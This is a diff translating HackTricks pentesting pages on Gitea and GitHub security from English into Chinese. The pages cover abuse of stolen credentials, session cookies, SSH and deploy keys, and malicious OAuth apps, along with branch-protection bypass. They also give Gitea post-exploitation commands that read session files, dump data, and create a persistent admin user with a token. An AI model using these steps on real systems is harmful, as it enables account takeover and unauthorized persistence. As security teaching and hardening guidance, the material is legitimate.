-Note that by **default Gitea allows new users to register**. This won't give specially interesting access to the new users over other organizations/users repos, but a **logged in user** might be able to **visualize more repos or organizations**.
+## 内部利用
-## Internal Exploitation
+在这个场景中,我们假设你已经获得了一些对 GitHub 账户的访问权限。
-For this scenario we are going to suppose that you have obtained some access to a github account.
+### 使用用户凭据/网页 Cookie
-### With User Credentials/Web Cookie
+如果你以某种方式已经获得了组织内某个用户的凭据(或者你窃取了一个会话 Cookie),你可以**直接登录**并检查你对哪些**仓库**拥有**权限**,你在哪些**团队**中,**列出其他用户**,以及**仓库是如何保护的**。
-If you somehow already have credentials for a user inside an organization (or you stole a session cookie) you can **just login** and check which which **permissions you have** over which **repos,** in **which teams** you are, **list other users**, and **how are the repos protected.**
-
-Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**.
+请注意,**可能会使用 2FA**,因此你只有在能够**通过该检查**的情况下才能访问这些信息。
> [!NOTE]
-> Note that if you **manage to steal the `i_like_gitea` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA.
+> 请注意,如果你**设法窃取了 `i_like_gitea` Cookie**(当前配置为 SameSite: Lax),你可以**完全冒充该用户**而无需凭据或 2FA。
-### With User SSH Key
+### 使用用户 SSH 密钥
-Gitea allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied).
-
-With this key you can perform **changes in repositories where the user has some privileges**, however you can not use it to access gitea api to enumerate the environment. However, you can **enumerate local settings** to get information about the repos and user you have access to:
+Gitea 允许**用户**设置**SSH 密钥**,该密钥将作为**代表他们部署代码的身份验证方法**(不适用 2FA)。
+使用此密钥,你可以对用户拥有某些权限的**仓库进行更改**,但是你不能使用它访问 Gitea API 来枚举环境。然而,你可以**枚举本地设置**以获取有关你有访问权限的仓库和用户的信息:
```bash
# Go to the the repository folder
# Get repo config and current user name and email
git config --list
```
+如果用户将其用户名配置为他的 gitea 用户名,您可以访问他在 _https://github.com/\.keys_ 中设置的 **公钥**,您可以检查此内容以确认您找到的私钥是否可以使用。
-If the user has configured its username as his gitea username you can access the **public keys he has set** in his account in _https://github.com/\.keys_, you could check this to confirm the private key you found can be used.
+**SSH 密钥** 也可以在仓库中设置为 **部署密钥**。任何拥有此密钥的人都将能够 **从仓库启动项目**。通常在具有不同部署密钥的服务器上,本地文件 **`~/.ssh/config`** 将提供与密钥相关的信息。
-**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related.
+#### GPG 密钥
-#### GPG Keys
-
-As explained [**here**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/gitea-security/broken-reference/README.md) sometimes it's needed to sign the commits or you might get discovered.
-
-Check locally if the current user has any key with:
+如 [**这里**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/gitea-security/broken-reference/README.md) 所述,有时需要签署提交,否则您可能会被发现。
+在本地检查当前用户是否有任何密钥:
```shell
gpg --list-secret-keys --keyid-format=long
```
+### 使用用户令牌
-### With User Token
+有关[**用户令牌的介绍,请查看基本信息**](basic-gitea-information.md#personal-access-tokens)。
-For an introduction about [**User Tokens check the basic information**](basic-gitea-information.md#personal-access-tokens).
+用户令牌可以**替代密码**来**认证**Gitea服务器[**通过API**](https://try.gitea.io/api/swagger#/)。它将对用户具有**完全访问权限**。
-A user token can be used **instead of a password** to **authenticate** against Gitea server [**via API**](https://try.gitea.io/api/swagger#/). it will has **complete access** over the user.
+### 使用Oauth应用程序
-### With Oauth Application
+有关[**Gitea Oauth应用程序的介绍,请查看基本信息**](./#with-oauth-application)。
-For an introduction about [**Gitea Oauth Applications check the basic information**](./#with-oauth-application).
+攻击者可能创建一个**恶意Oauth应用程序**来访问接受它们的用户的特权数据/操作,这可能是网络钓鱼活动的一部分。
-An attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign.
+如基本信息中所述,该应用程序将对用户帐户具有**完全访问权限**。
-As explained in the basic information, the application will have **full access over the user account**.
+### 绕过分支保护
-### Branch Protection Bypass
+在Github中,我们有**github actions**,默认情况下会获得对仓库的**写入访问权限**的**令牌**,可以用来**绕过分支保护**。在这种情况下**不存在**,因此绕过的方式更有限。但让我们看看可以做些什么:
-In Github we have **github actions** which by default get a **token with write access** over the repo that can be used to **bypass branch protections**. In this case that **doesn't exist**, so the bypasses are more limited. But lets take a look to what can be done:
+- **启用推送**:如果任何具有写入权限的人可以推送到该分支,只需推送即可。
+- **白名单限制推送**:同样,如果您是此列表的一部分,则可以推送到该分支。
+- **启用合并白名单**:如果有合并白名单,您需要在其中。
+- **需要的批准大于0**:那么...您需要妥协另一个用户。
+- **限制批准给白名单用户**:如果只有白名单用户可以批准...您需要妥协另一个在该列表中的用户。
+- **撤销过期批准**:如果批准没有随着新提交而被移除,您可以劫持一个已经批准的PR来注入您的代码并合并PR。
-- **Enable Push**: If anyone with write access can push to the branch, just push to it.
-- **Whitelist Restricted Pus**h: The same way, if you are part of this list push to the branch.
-- **Enable Merge Whitelist**: If there is a merge whitelist, you need to be inside of it
-- **Require approvals is bigger than 0**: Then... you need to compromise another user
-- **Restrict approvals to whitelisted**: If only whitelisted users can approve... you need to compromise another user that is inside that list
-- **Dismiss stale approvals**: If approvals are not removed with new commits, you could hijack an already approved PR to inject your code and merge the PR.
+请注意**如果您是组织/仓库管理员**,您可以绕过保护。
-Note that **if you are an org/repo admin** you can bypass the protections.
+### 枚举Webhooks
-### Enumerate Webhooks
+**Webhooks**能够**将特定的gitea信息发送到某些地方**。您可能能够**利用这种通信**。\
+然而,通常在**webhook**中设置了一个您**无法检索**的**密钥**,这将**防止**外部用户知道webhook的URL但不知道密钥来**利用该webhook**。\
+但在某些情况下,人们不是将**密钥**设置在其位置,而是将其**作为参数设置在URL中**,因此**检查URL**可能允许您**找到密钥**和其他您可以进一步利用的地方。
-**Webhooks** are able to **send specific gitea information to some places**. You might be able to **exploit that communication**.\
-However, usually a **secret** you can **not retrieve** is set in the **webhook** that will **prevent** external users that know the URL of the webhook but not the secret to **exploit that webhook**.\
-But in some occasions, people instead of setting the **secret** in its place, they **set it in the URL** as a parameter, so **checking the URLs** could allow you to **find secrets** and other places you could exploit further.
+Webhooks可以在**仓库和组织级别**设置。
-Webhooks can be set at **repo and at org level**.
+## 后期利用
-## Post Exploitation
+### 服务器内部
-### Inside the server
+如果您以某种方式设法进入运行gitea的服务器,您应该搜索gitea配置文件。默认情况下,它位于`/data/gitea/conf/app.ini`
-If somehow you managed to get inside the server where gitea is running you should search for the gitea configuration file. By default it's located in `/data/gitea/conf/app.ini`
+在此文件中,您可以找到**密钥**和**密码**。
-In this file you can find **keys** and **passwords**.
+在gitea路径(默认:/data/gitea)中,您还可以找到有趣的信息,例如:
-In the gitea path (by default: /data/gitea) you can find also interesting information like:
+- **sqlite**数据库:如果gitea不使用外部数据库,它将使用sqlite数据库。
+- **会话**在会话文件夹中:运行`cat sessions/*/*/*`可以看到已登录用户的用户名(gitea也可以将会话保存在数据库中)。
+- **jwt私钥**在jwt文件夹中。
+- 该文件夹中可能找到更多**敏感信息**。
-- The **sqlite** DB: If gitea is not using an external db it will use a sqlite db
-- The **sessions** inside the sessions folder: Running `cat sessions/*/*/*` you can see the usernames of the logged users (gitea could also save the sessions inside the DB).
-- The **jwt private key** inside the jwt folder
-- More **sensitive information** could be found in this folder
+如果您在服务器内部,您还可以**使用`gitea`二进制文件**来访问/修改信息:
-If you are inside the server you can also **use the `gitea` binary** to access/modify information:
-
-- `gitea dump` will dump gitea and generate a .zip file
-- `gitea generate secret INTERNAL_TOKEN/JWT_SECRET/SECRET_KEY/LFS_JWT_SECRET` will generate a token of the indicated type (persistence)
-- `gitea admin user change-password --username admin --password newpassword` Change the password
-- `gitea admin user create --username newuser --password superpassword --email user@user.user --admin --access-token` Create new admin user and get an access token
+- `gitea dump`将转储gitea并生成一个.zip文件。
+- `gitea generate secret INTERNAL_TOKEN/JWT_SECRET/SECRET_KEY/LFS_JWT_SECRET`将生成指定类型的令牌(持久性)。
+- `gitea admin user change-password --username admin --password newpassword`更改密码。
+- `gitea admin user create --username newuser --password superpassword --email user@user.user --admin --access-token`创建新管理员用户并获取访问令牌。
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md b/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md
index e6e4d9ba3..6befd4569 100644
--- a/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md
+++ b/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md
@@ -4,104 +4,100 @@
## Basic Structure
-The basic Gitea environment structure is to group repos by **organization(s),** each of them may contain **several repositories** and **several teams.** However, note that just like in github users can have repos outside of the organization.
+基本的 Gitea 环境结构是通过 **组织** 来分组仓库,每个组织可以包含 **多个仓库** 和 **多个团队**。然而,请注意,就像在 GitHub 中一样,用户可以在组织外拥有仓库。
-Moreover, a **user** can be a **member** of **different organizations**. Within the organization the user may have **different permissions over each repository**.
+此外,**用户** 可以是 **不同组织的成员**。在组织内,用户可能对每个仓库拥有 **不同的权限**。
-A user may also be **part of different teams** with different permissions over different repos.
+用户也可以是 **不同团队的一部分**,对不同仓库拥有不同的权限。
-And finally **repositories may have special protection mechanisms**.
+最后,**仓库可能具有特殊的保护机制**。
## Permissions
### Organizations
-When an **organization is created** a team called **Owners** is **created** and the user is put inside of it. This team will give **admin access** over the **organization**, those **permissions** and the **name** of the team **cannot be modified**.
+当 **组织被创建** 时,会创建一个名为 **Owners** 的团队,并将用户放入其中。该团队将提供对 **组织的管理员访问**,这些 **权限** 和团队的 **名称** **无法修改**。
-**Org admins** (owners) can select the **visibility** of the organization:
+**组织管理员**(所有者)可以选择组织的 **可见性**:
-- Public
-- Limited (logged in users only)
-- Private (members only)
+- 公开
+- 限制(仅限登录用户)
+- 私有(仅限成员)
-**Org admins** can also indicate if the **repo admins** can **add and or remove access** for teams. They can also indicate the max number of repos.
+**组织管理员** 还可以指示 **仓库管理员** 是否可以 **添加或移除团队的访问权限**。他们还可以指示最大仓库数量。
-When creating a new team, several important settings are selected:
+创建新团队时,会选择几个重要设置:
-- It's indicated the **repos of the org the members of the team will be able to access**: specific repos (repos where the team is added) or all.
-- It's also indicated **if members can create new repos** (creator will get admin access to it)
-- The **permissions** the **members** of the repo will **have**:
- - **Administrator** access
- - **Specific** access:
+- 指定 **团队成员可以访问的组织仓库**:特定仓库(团队被添加的仓库)或所有仓库。
+- 还指示 **成员是否可以创建新仓库**(创建者将获得对其的管理员访问权限)
+- **成员** 在仓库中将 **拥有的权限**:
+- **管理员** 访问
+- **特定** 访问:
.png>)
### Teams & Users
-In a repo, the **org admin** and the **repo admins** (if allowed by the org) can **manage the roles** given to collaborators (other users) and teams. There are **3** possible **roles**:
+在仓库中,**组织管理员** 和 **仓库管理员**(如果组织允许)可以 **管理分配给协作者(其他用户)和团队的角色**。有 **3** 种可能的 **角色**:
-- Administrator
-- Write
-- Read
+- 管理员
+- 写入
+- 读取
## Gitea Authentication
### Web Access
-Using **username + password** and potentially (and recommended) a 2FA.
+使用 **用户名 + 密码**,并可能(推荐)使用 2FA。
### **SSH Keys**
-You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys)
+您可以使用一个或多个公钥配置您的帐户,允许相关的 **私钥代表您执行操作**。 [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys)
#### **GPG Keys**
-You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**.
+您 **无法使用这些密钥冒充用户**,但如果您不使用它,可能会导致您 **因发送未签名的提交而被发现**。
### **Personal Access Tokens**
-You can generate personal access token to **give an application access to your account**. A personal access token gives full access over your account: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications)
+您可以生成个人访问令牌,以 **授予应用程序访问您的帐户**。个人访问令牌对您的帐户具有完全访问权限:[http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications)
### Oauth Applications
-Just like personal access tokens **Oauth applications** will have **complete access** over your account and the places your account has access because, as indicated in the [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes), scopes aren't supported yet:
+与个人访问令牌一样,**Oauth 应用程序**将对您的帐户及其访问的地方具有 **完全访问权限**,因为如 [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes) 中所示,范围尚不支持:
.png>)
### Deploy keys
-Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos.
+部署密钥可能对仓库具有只读或写入访问权限,因此它们可能对破坏特定仓库很有趣。
## Branch Protections
-Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**.
+分支保护旨在 **不将仓库的完全控制权授予用户**。目标是在能够在某些分支中编写代码之前 **设置几种保护方法**。
-The **branch protections of a repository** can be found in _https://localhost:3000/\/\/settings/branches_
+**仓库的分支保护** 可以在 _https://localhost:3000/\/\/settings/branches_ 中找到。
> [!NOTE]
-> It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo.
+> **无法在组织级别设置分支保护**。因此,所有保护必须在每个仓库中声明。
-Different protections can be applied to a branch (like to master):
+可以对分支(例如主分支)应用不同的保护:
-- **Disable Push**: No-one can push to this branch
-- **Enable Push**: Anyone with access can push, but not force push.
-- **Whitelist Restricted Push**: Only selected users/teams can push to this branch (but no force push)
-- **Enable Merge Whitelist**: Only whitelisted users/teams can merge PRs.
-- **Enable Status checks:** Require status checks to pass before merging.
-- **Require approvals**: Indicate the number of approvals required before a PR can be merged.
-- **Restrict approvals to whitelisted**: Indicate users/teams that can approve PRs.
-- **Block merge on rejected reviews**: If changes are requested, it cannot be merged (even if the other checks pass)
-- **Block merge on official review requests**: If there official review requests it cannot be merged
-- **Dismiss stale approvals**: When new commits, old approvals will be dismissed.
-- **Require Signed Commits**: Commits must be signed.
-- **Block merge if pull request is outdated**
-- **Protected/Unprotected file patterns**: Indicate patterns of files to protect/unprotect against changes
+- **禁用推送**:无人可以推送到此分支
+- **启用推送**:任何有访问权限的人都可以推送,但不能强制推送。
+- **白名单限制推送**:只有选定的用户/团队可以推送到此分支(但不能强制推送)
+- **启用合并白名单**:只有白名单中的用户/团队可以合并 PR。
+- **启用状态检查**:合并之前需要通过状态检查。
+- **要求批准**:指示合并 PR 之前所需的批准数量。
+- **限制批准给白名单**:指示可以批准 PR 的用户/团队。
+- **在拒绝审查时阻止合并**:如果请求更改,则无法合并(即使其他检查通过)
+- **在官方审查请求时阻止合并**:如果有官方审查请求,则无法合并
+- **撤销过期的批准**:当有新提交时,旧的批准将被撤销。
+- **要求签名提交**:提交必须签名。
+- **如果拉取请求过时则阻止合并**
+- **受保护/不受保护的文件模式**:指示要保护/不保护的文件模式
> [!NOTE]
-> As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline.
+> 如您所见,即使您设法获得某个用户的凭据,**仓库可能受到保护,避免您将代码推送到主分支**,例如,以破坏 CI/CD 管道。
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/github-security/README.md b/src/pentesting-ci-cd/github-security/README.md
index cdad12b57..073d04233 100644
--- a/src/pentesting-ci-cd/github-security/README.md
+++ b/src/pentesting-ci-cd/github-security/README.md
@@ -2,41 +2,41 @@
{{#include ../../banners/hacktricks-training.md}}
-## What is Github
+## 什么是Github
-(From [here](https://kinsta.com/knowledgebase/what-is-github/)) At a high level, **GitHub is a website and cloud-based service that helps developers store and manage their code, as well as track and control changes to their code**.
+(来自 [这里](https://kinsta.com/knowledgebase/what-is-github/)) 从高层次来看,**GitHub是一个网站和基于云的服务,帮助开发者存储和管理他们的代码,以及跟踪和控制代码的更改**。
-### Basic Information
+### 基本信息
{{#ref}}
basic-github-information.md
{{#endref}}
-## External Recon
+## 外部侦查
-Github repositories can be configured as public, private and internal.
+Github 仓库可以配置为公共、私有和内部。
-- **Private** means that **only** people of the **organisation** will be able to access them
-- **Internal** means that **only** people of the **enterprise** (an enterprise may have several organisations) will be able to access it
-- **Public** means that **all internet** is going to be able to access it.
+- **私有**意味着**只有**组织中的人才能访问它们
+- **内部**意味着**只有**企业中的人(一个企业可能有多个组织)才能访问它
+- **公共**意味着**所有互联网**用户都可以访问它。
-In case you know the **user, repo or organisation you want to target** you can use **github dorks** to find sensitive information or search for **sensitive information leaks** **on each repo**.
+如果你知道**想要攻击的用户、仓库或组织**,你可以使用**github dorks**来查找敏感信息或搜索**每个仓库中的敏感信息泄露**。
### Github Dorks
-Github allows to **search for something specifying as scope a user, a repo or an organisation**. Therefore, with a list of strings that are going to appear close to sensitive information you can easily **search for potential sensitive information in your target**.
+Github 允许**通过指定用户、仓库或组织作为范围来搜索某些内容**。因此,使用一系列将出现在敏感信息附近的字符串,你可以轻松地**搜索目标中的潜在敏感信息**。
-Tools (each tool contains its list of dorks):
+工具(每个工具包含其 dorks 列表):
-- [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) ([Dorks list](https://github.com/obheda12/GitDorker/tree/master/Dorks))
-- [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) ([Dorks list](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt))
-- [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) ([Dorks list](https://github.com/hisxo/gitGraber/tree/master/wordlists))
+- [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) ([Dorks 列表](https://github.com/obheda12/GitDorker/tree/master/Dorks))
+- [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) ([Dorks 列表](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt))
+- [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) ([Dorks 列表](https://github.com/hisxo/gitGraber/tree/master/wordlists))
-### Github Leaks
+### Github 泄露
-Please, note that the github dorks are also meant to search for leaks using github search options. This section is dedicated to those tools that will **download each repo and search for sensitive information in them** (even checking certain depth of commits).
+请注意,github dorks 也旨在使用 github 搜索选项查找泄露。此部分专门介绍那些将**下载每个仓库并搜索其中敏感信息**的工具(甚至检查某些深度的提交)。
-Tools (each tool contains its list of regexes):
+工具(每个工具包含其正则表达式列表):
- [https://github.com/zricethezav/gitleaks](https://github.com/zricethezav/gitleaks)
- [https://github.com/trufflesecurity/truffleHog](https://github.com/trufflesecurity/truffleHog)
@@ -47,202 +47,190 @@ Tools (each tool contains its list of regexes):
- [https://github.com/awslabs/git-secrets](https://github.com/awslabs/git-secrets)
> [!WARNING]
-> When you look for leaks in a repo and run something like `git log -p` don't forget there might be **other branches with other commits** containing secrets!
+> 当你在一个仓库中查找泄露并运行类似 `git log -p` 的命令时,不要忘记可能还有**其他分支和其他提交**包含秘密!
-### External Forks
+### 外部分支
-It's possible to **compromise repos abusing pull requests**. To know if a repo is vulnerable you mostly need to read the Github Actions yaml configs. [**More info about this below**](./#execution-from-a-external-fork).
+可以通过**滥用拉取请求来妥协仓库**。要知道一个仓库是否脆弱,你主要需要阅读 Github Actions yaml 配置。 [**更多信息见下文**](./#execution-from-a-external-fork)。
-### Github Leaks in deleted/internal forks
+### Github 在删除/内部分支中的泄露
-Even if deleted or internal it might be possible to obtain sensitive data from forks of github repositories. Check it here:
+即使是删除或内部的,也可能从 github 仓库的分支中获取敏感数据。请在此查看:
{{#ref}}
accessible-deleted-data-in-github.md
{{#endref}}
-## Organization Hardening
+## 组织强化
-### Member Privileges
+### 成员权限
-There are some **default privileges** that can be assigned to **members** of the organization. These can be controlled from the page `https://github.com/organizations//settings/member_privileges` or from the [**Organizations API**](https://docs.github.com/en/rest/orgs/orgs).
+可以为组织的**成员**分配一些**默认权限**。这些可以从页面 `https://github.com/organizations//settings/member_privileges` 或从 [**Organizations API**](https://docs.github.com/en/rest/orgs/orgs) 控制。
-- **Base permissions**: Members will have the permission None/Read/write/Admin over the org repositories. Recommended is **None** or **Read**.
-- **Repository forking**: If not necessary, it's better to **not allow** members to fork organization repositories.
-- **Pages creation**: If not necessary, it's better to **not allow** members to publish pages from the org repos. If necessary you can allow to create public or private pages.
-- **Integration access requests**: With this enabled outside collaborators will be able to request access for GitHub or OAuth apps to access this organization and its resources. It's usually needed, but if not, it's better to disable it.
- - _I couldn't find this info in the APIs response, share if you do_
-- **Repository visibility change**: If enabled, **members** with **admin** permissions for the **repository** will be able to **change its visibility**. If disabled, only organization owners can change repository visibilities. If you **don't** want people to make things **public**, make sure this is **disabled**.
- - _I couldn't find this info in the APIs response, share if you do_
-- **Repository deletion and transfer**: If enabled, members with **admin** permissions for the repository will be able to **delete** or **transfer** public and private **repositories.**
- - _I couldn't find this info in the APIs response, share if you do_
-- **Allow members to create teams**: If enabled, any **member** of the organization will be able to **create** new **teams**. If disabled, only organization owners can create new teams. It's better to have this disabled.
- - _I couldn't find this info in the APIs response, share if you do_
-- **More things can be configured** in this page but the previous are the ones more security related.
+- **基本权限**:成员将对组织仓库拥有 None/Read/write/Admin 权限。推荐使用**None**或**Read**。
+- **仓库分叉**:如果不必要,最好**不允许**成员分叉组织仓库。
+- **页面创建**:如果不必要,最好**不允许**成员从组织仓库发布页面。如果必要,可以允许创建公共或私有页面。
+- **集成访问请求**:启用后,外部协作者将能够请求访问 GitHub 或 OAuth 应用以访问该组织及其资源。通常是需要的,但如果不需要,最好禁用它。
+- _我在 API 响应中找不到此信息,如果你找到了,请分享_
+- **仓库可见性更改**:如果启用,具有**管理员**权限的**成员**将能够**更改其可见性**。如果禁用,只有组织所有者可以更改仓库的可见性。如果你**不**希望人们将内容**公开**,请确保此选项**禁用**。
+- _我在 API 响应中找不到此信息,如果你找到了,请分享_
+- **仓库删除和转移**:如果启用,具有**管理员**权限的成员将能够**删除**或**转移**公共和私有**仓库**。
+- _我在 API 响应中找不到此信息,如果你找到了,请分享_
+- **允许成员创建团队**:如果启用,任何**成员**都将能够**创建**新**团队**。如果禁用,只有组织所有者可以创建新团队。最好将此选项禁用。
+- _我在 API 响应中找不到此信息,如果你找到了,请分享_
+- **此页面上可以配置更多内容**,但前面的内容与安全性相关性更大。
-### Actions Settings
+### Actions 设置
-Several security related settings can be configured for actions from the page `https://github.com/organizations//settings/actions`.
+可以从页面 `https://github.com/organizations//settings/actions` 配置多个与安全相关的设置。
> [!NOTE]
-> Note that all this configurations can also be set on each repository independently
+> 请注意,所有这些配置也可以在每个仓库中独立设置
-- **Github actions policies**: It allows you to indicate which repositories can tun workflows and which workflows should be allowed. It's recommended to **specify which repositories** should be allowed and not allow all actions to run.
- - [**API-1**](https://docs.github.com/en/rest/actions/permissions#get-allowed-actions-and-reusable-workflows-for-an-organization)**,** [**API-2**](https://docs.github.com/en/rest/actions/permissions#list-selected-repositories-enabled-for-github-actions-in-an-organization)
-- **Fork pull request workflows from outside collaborators**: It's recommended to **require approval for all** outside collaborators.
- - _I couldn't find an API with this info, share if you do_
-- **Run workflows from fork pull requests**: It's highly **discouraged to run workflows from pull requests** as maintainers of the fork origin will be given the ability to use tokens with read permissions on the source repository.
- - _I couldn't find an API with this info, share if you do_
-- **Workflow permissions**: It's highly recommended to **only give read repository permissions**. It's discouraged to give write and create/approve pull requests permissions to avoid the abuse of the GITHUB_TOKEN given to running workflows.
- - [**API**](https://docs.github.com/en/rest/actions/permissions#get-default-workflow-permissions-for-an-organization)
+- **Github actions 策略**:允许你指明哪些仓库可以运行工作流,哪些工作流应该被允许。建议**指定哪些仓库**应该被允许,而不是允许所有操作运行。
+- [**API-1**](https://docs.github.com/en/rest/actions/permissions#get-allowed-actions-and-reusable-workflows-for-an-organization)**,** [**API-2**](https://docs.github.com/en/rest/actions/permissions#list-selected-repositories-enabled-for-github-actions-in-an-organization)
+- **来自外部协作者的拉取请求工作流**:建议**要求所有**外部协作者的批准。
+- _我找不到包含此信息的 API,如果你找到了,请分享_
+- **从拉取请求运行工作流**:强烈**不建议从拉取请求运行工作流**,因为分叉源的维护者将获得使用具有读取权限的令牌访问源仓库的能力。
+- _我找不到包含此信息的 API,如果你找到了,请分享_
+- **工作流权限**:强烈建议**仅授予读取仓库权限**。不建议授予写入和创建/批准拉取请求的权限,以避免滥用授予运行工作流的 GITHUB_TOKEN。
+- [**API**](https://docs.github.com/en/rest/actions/permissions#get-default-workflow-permissions-for-an-organization)
-### Integrations
+### 集成
-_Let me know if you know the API endpoint to access this info!_
+_如果你知道访问此信息的 API 端点,请告诉我!_
-- **Third-party application access policy**: It's recommended to restrict the access to every application and allow only the needed ones (after reviewing them).
-- **Installed GitHub Apps**: It's recommended to only allow the needed ones (after reviewing them).
+- **第三方应用访问策略**:建议限制对每个应用的访问,仅允许必要的应用(在审核后)。
+- **已安装的 GitHub 应用**:建议仅允许必要的应用(在审核后)。
-## Recon & Attacks abusing credentials
+## 侦查与攻击滥用凭证
-For this scenario we are going to suppose that you have obtained some access to a github account.
+在此场景中,我们假设你已经获得了对一个 github 账户的某些访问权限。
-### With User Credentials
+### 使用用户凭证
-If you somehow already have credentials for a user inside an organization you can **just login** and check which **enterprise and organization roles you have**, if you are a raw member, check which **permissions raw members have**, in which **groups** you are, which **permissions you have** over which **repos,** and **how are the repos protected.**
+如果你以某种方式已经拥有组织内某个用户的凭证,你可以**直接登录**并检查你拥有的**企业和组织角色**,如果你是普通成员,检查普通成员拥有的**权限**、你所在的**组**、你对哪些**仓库**拥有的**权限**以及**这些仓库是如何保护的**。
-Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**.
+请注意,**可能会使用 2FA**,因此你只能在能够**通过该检查**的情况下访问此信息。
> [!NOTE]
-> Note that if you **manage to steal the `user_session` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA.
+> 请注意,如果你**设法窃取了 `user_session` cookie**(当前配置为 SameSite: Lax),你可以**完全冒充用户**而无需凭证或 2FA。
-Check the section below about [**branch protections bypasses**](./#branch-protection-bypass) in case it's useful.
+请查看下面关于 [**分支保护绕过**](./#branch-protection-bypass) 的部分,以防有用。
-### With User SSH Key
+### 使用用户 SSH 密钥
-Github allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied).
-
-With this key you can perform **changes in repositories where the user has some privileges**, however you can not sue it to access github api to enumerate the environment. However, you can get **enumerate local settings** to get information about the repos and user you have access to:
+Github 允许**用户**设置**SSH 密钥**,作为**代表他们部署代码的身份验证方法**(不应用 2FA)。
+使用此密钥,你可以对用户拥有某些权限的仓库进行**更改**,但是你不能使用它访问 github api 来枚举环境。然而,你可以**枚举本地设置**以获取有关你有访问权限的仓库和用户的信息:
```bash
# Go to the the repository folder
# Get repo config and current user name and email
git config --list
```
+如果用户将其用户名配置为他的 github 用户名,您可以访问他帐户中设置的 **公钥**,网址为 _https://github.com/\.keys_,您可以检查此内容以确认您找到的私钥是否可以使用。
-If the user has configured its username as his github username you can access the **public keys he has set** in his account in _https://github.com/\.keys_, you could check this to confirm the private key you found can be used.
+**SSH 密钥** 也可以在存储库中设置为 **部署密钥**。任何拥有此密钥的人都将能够 **从存储库启动项目**。通常在具有不同部署密钥的服务器上,本地文件 **`~/.ssh/config`** 将提供与密钥相关的信息。
-**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related.
+#### GPG 密钥
-#### GPG Keys
-
-As explained [**here**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/github-security/broken-reference/README.md) sometimes it's needed to sign the commits or you might get discovered.
-
-Check locally if the current user has any key with:
+如 [**这里**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/github-security/broken-reference/README.md) 所述,有时需要签署提交,否则您可能会被发现。
+在本地检查当前用户是否有任何密钥:
```shell
gpg --list-secret-keys --keyid-format=long
```
+### 使用用户令牌
-### With User Token
+有关[**用户令牌的介绍,请查看基本信息**](basic-github-information.md#personal-access-tokens)。
-For an introduction about [**User Tokens check the basic information**](basic-github-information.md#personal-access-tokens).
+用户令牌可以用作**HTTPS下Git的密码**,或用于[**通过基本身份验证对API进行身份验证**](https://docs.github.com/v3/auth/#basic-authentication)。根据附加的权限,您可能能够执行不同的操作。
-A user token can be used **instead of a password** for Git over HTTPS, or can be used to [**authenticate to the API over Basic Authentication**](https://docs.github.com/v3/auth/#basic-authentication). Depending on the privileges attached to it you might be able to perform different actions.
+用户令牌的格式如下:`ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123`
-A User token looks like this: `ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123`
+### 使用Oauth应用程序
-### With Oauth Application
+有关[**Github Oauth应用程序的介绍,请查看基本信息**](basic-github-information.md#oauth-applications)。
-For an introduction about [**Github Oauth Applications check the basic information**](basic-github-information.md#oauth-applications).
+攻击者可能创建一个**恶意Oauth应用程序**,以访问接受它们的用户的特权数据/操作,可能作为网络钓鱼活动的一部分。
-An attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign.
+这些是[Oauth应用程序可以请求的范围](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps)。在接受之前,应该始终检查请求的范围。
-These are the [scopes an Oauth application can request](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps). A should always check the scopes requested before accepting them.
+此外,如基本信息中所述,**组织可以授予/拒绝第三方应用程序对与组织相关的信息/仓库/操作的访问**。
-Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation.
+### 使用Github应用程序
-### With Github Application
